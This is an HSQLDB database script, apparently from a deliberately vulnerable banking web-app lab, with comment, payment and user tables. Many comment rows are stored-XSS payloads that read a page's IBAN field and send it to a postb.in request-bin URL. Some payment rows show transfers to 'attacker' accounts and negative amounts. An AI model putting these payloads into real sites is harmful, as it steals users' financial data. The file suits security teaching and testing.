SET DATABASE UNIQUE NAME HSQLDB74CA4008DE
SET DATABASE GC 0
SET DATABASE DEFAULT RESULT MEMORY ROWS 0
SET DATABASE EVENT LOG LEVEL 0
SET DATABASE TRANSACTION CONTROL LOCKS
SET DATABASE DEFAULT ISOLATION LEVEL READ COMMITTED
SET DATABASE TRANSACTION ROLLBACK ON CONFLICT TRUE
SET DATABASE TEXT TABLE DEFAULTS ''
SET DATABASE SQL NAMES FALSE
SET DATABASE SQL REFERENCES FALSE
SET DATABASE SQL SIZE TRUE
SET DATABASE SQL TYPES FALSE
SET DATABASE SQL TDC DELETE TRUE
SET DATABASE SQL TDC UPDATE TRUE
SET DATABASE SQL CONCAT NULLS TRUE
SET DATABASE SQL UNIQUE NULLS TRUE
SET DATABASE SQL CONVERT TRUNCATE TRUE
SET DATABASE SQL AVG SCALE 0
SET DATABASE SQL DOUBLE NAN TRUE
SET FILES WRITE DELAY 500 MILLIS
SET FILES BACKUP INCREMENT TRUE
SET FILES CACHE SIZE 10000
SET FILES CACHE ROWS 50000
SET FILES SCALE 32
SET FILES LOB SCALE 32
SET FILES DEFRAG 0
SET FILES NIO TRUE
SET FILES NIO SIZE 256
SET FILES LOG TRUE
SET FILES LOG SIZE 50
SET FILES CHECK 800
CREATE USER SA PASSWORD DIGEST 'd41d8cd98f00b204e9800998ecf8427e'
ALTER USER SA SET LOCAL TRUE
CREATE SCHEMA PUBLIC AUTHORIZATION DBA
SET SCHEMA PUBLIC
CREATE MEMORY TABLE PUBLIC.COMMENT(COMMENT VARCHAR(255),DATE VARCHAR(10),SCORE VARCHAR(1))
CREATE MEMORY TABLE PUBLIC.INVESTMENT(OWNER VARCHAR(50),DATE INTEGER,AMOUNT VARCHAR(50),CURRENCY VARCHAR(10),AMOUNTSFR VARCHAR(50))
CREATE MEMORY TABLE PUBLIC.PAYMENT(OWNER VARCHAR(50),TARGET VARCHAR(50),AMOUNT INTEGER,CURRENCY VARCHAR(10),AMOUNTSFR INTEGER)
CREATE MEMORY TABLE PUBLIC.MESSAGE(OWNER VARCHAR(50),DATE INTEGER,VIEWTYPE INTEGER,MESSAGE VARCHAR(255))
CREATE MEMORY TABLE PUBLIC.USER(EMAIL VARCHAR(50),PASSWORD VARCHAR(100))
ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 1
SET DATABASE DEFAULT INITIAL SCHEMA PUBLIC
GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.SQL_IDENTIFIER TO PUBLIC
GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.YES_OR_NO TO PUBLIC
GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.TIME_STAMP TO PUBLIC
GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.CARDINAL_NUMBER TO PUBLIC
GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.CHARACTER_DATA TO PUBLIC
GRANT DBA TO SA
SET SCHEMA SYSTEM_LOBS
INSERT INTO BLOCKS VALUES(0,2147483647,0)
SET SCHEMA PUBLIC
INSERT INTO COMMENT VALUES('<script>new Image().src=encodeURI("https://postb.in/1601119971063-6338393660262?iban=".concat(document.getElementById(''iban'').text));</script>','26-09-2020','5')
INSERT INTO COMMENT VALUES('<script>new Image().src = encodeURI(''https://postb.in/1601119971063-6338393660262?iban=''.concat(document.getElementById(''iban'').text));</script>','26-09-2020','5')
INSERT INTO COMMENT VALUES('<script>new Image().src=encodeURI(''https://postb.in/1601119971063-6338393660262?iban=''.concat(document.getElementById(''iban'').text));</script>','26-09-2020','5')
INSERT INTO COMMENT VALUES('<script>new Image().src=encodeURI(''https://postb.in/1601119971063-6338393660262?iban=''.concat(document.getElementById(''iban'').text));</script>','26-09-2020','5')
INSERT INTO COMMENT VALUES('<script>new Image().src=encodeURI(''https://postb.in/1601119971063-6338393660262?iban=''.concat(document.getElementById(''iban'').text));</script>','26-09-2020','5')
INSERT INTO COMMENT VALUES('<script>new Image().src = encodeURI(''https://postb.in/1601121815843-1528982487507?iban=''.concat(document.getElementById(''iban'');</script>','26-09-2020','5')
INSERT INTO COMMENT VALUES('new Image().src = encodeURI(''https://postb.in/1601121815843-1528982487507?iban=''.concat(document.getElementById(''iban''));','26-09-2020','5')
INSERT INTO COMMENT VALUES('<script>new Image().src = encodeURI(''https://postb.in/1601121815843-1528982487507?iban=''.concat(document.getElementById(''iban''));</script>','26-09-2020','5')
INSERT INTO COMMENT VALUES('<script>new Image().src = encodeURI(''https://postb.in/1601121815843-1528982487507?iban=''.concat(document.getElementById(''iban'')));</script>','26-09-2020','5')
INSERT INTO COMMENT VALUES('<script>new Image().src = encodeURI(''https://postb.in/1601121815843-1528982487507?iban=''.concat(document.getElementById(''iban'').text));</script>','26-09-2020','5')
INSERT INTO COMMENT VALUES('<script>new Image().src = encodeURI(''http://postb.in/1601121815843-1528982487507?iban=''.concat(document.getElementById(''iban'').text));</script>','26-09-2020','5')
INSERT INTO COMMENT VALUES('<script>new Image().src = encodeURI(''http://postb.in/1601121815843-1528982487507?iban='' document.getElementById(''iban'').text);</script>','26-09-2020','5')
INSERT INTO COMMENT VALUES('<script>\u000anew Image().src = encodeURI("https://postb.in/1601121815843-1528982487507?iban=".concat(document.getElementById(''iban'').text));\u000a</script>','26-09-2020','5')
INSERT INTO COMMENT VALUES('<script>alert("XSS")</script>','29-09-2020','5')
INSERT INTO PAYMENT VALUES('greg@gmail.com','attacker@mail.com',100,'SFr',100)
INSERT INTO PAYMENT VALUES('greg@gmail.com','attacker@mail.com',100,'SFr',1000)
INSERT INTO PAYMENT VALUES('greg@gmail.com','target@mail.com',122,'SFr',122)
INSERT INTO PAYMENT VALUES('greg@gmail.com','target@mail.com',129,'SFr',129)
INSERT INTO PAYMENT VALUES('greg@gmail.com','greg@gmail.com',129,'SFr',129)
INSERT INTO PAYMENT VALUES('greg@gmail.com','greg@gmail.com',100,'SFr',100)
INSERT INTO PAYMENT VALUES('greg@gmail.com','greg@gmail.com',900,'SFr',900)
INSERT INTO PAYMENT VALUES('attacker@gmail.com','greg@gmail.com',500,'SFr',500)
INSERT INTO PAYMENT VALUES('victim@mail.com','target@mail.com',99,'SFr',99)
INSERT INTO PAYMENT VALUES('victim@mail.com','attacker@mail.com',100,'SFr',100)
INSERT INTO PAYMENT VALUES('victim@mail.com','attacker@mail.com',100,'SFr',100)
INSERT INTO PAYMENT VALUES('victim@mail.com','target@mail.com',99,'SFr',99)
INSERT INTO PAYMENT VALUES('victim@mail.com','attacker@gmail.com',99,'SFr',99)
INSERT INTO PAYMENT VALUES('victim@mail.com','attacker@gmail.com',400,'SFr',400)
INSERT INTO PAYMENT VALUES('victim@mail.com','attacker@gmail.com',400,'SFr',400)
INSERT INTO PAYMENT VALUES('victim@mail.com','target@mail.com',10,'SFr',10)
INSERT INTO PAYMENT VALUES('victim@mail.com','attacker@mail.com',50,'SFr',50)
INSERT INTO PAYMENT VALUES('greg@gmail.com','greg@gmail.com',1000,'SFr',-1000)
INSERT INTO PAYMENT VALUES('greg@gmail.com','greg@gmail.com',1000,'SFr',-1000)
INSERT INTO PAYMENT VALUES('greg@gmail.com','greg@gmail.com',10,'SFr',-10)
INSERT INTO PAYMENT VALUES('greg@gmail.com','target@mail.com',100,'SFr',-100)
INSERT INTO PAYMENT VALUES('greg@gmail.com','target@mail.com',666,'SFr',666)
INSERT INTO PAYMENT VALUES('greg@gmail.com','target@mail.com',567,'SFr',567)
INSERT INTO USER VALUES('greg@gmail.com','bb6679bd15b7f000a63a68cc289e8be1b7dd36710be46dffac38962a7e9a54b0')
INSERT INTO USER VALUES('attacker@gmail.com','e64ba38a4b958c72bc0d421150ba464636422485ed72fab7086c7691ce4008cc')
INSERT INTO USER VALUES('victim@mail.com','1bdd5b5b92e2d9f30a3b223bb359551d0da20e3702923e5f7b0a73889eba3d21')
INSERT INTO USER VALUES('attacker@mail.com','e64ba38a4b958c72bc0d421150ba464636422485ed72fab7086c7691ce4008cc')
INSERT INTO USER VALUES('barbara@mail.com','4da860a59a46e88c2b71a71baf7a2e2d0b2b42c583ffb04e8f0f671dfd0b3493')
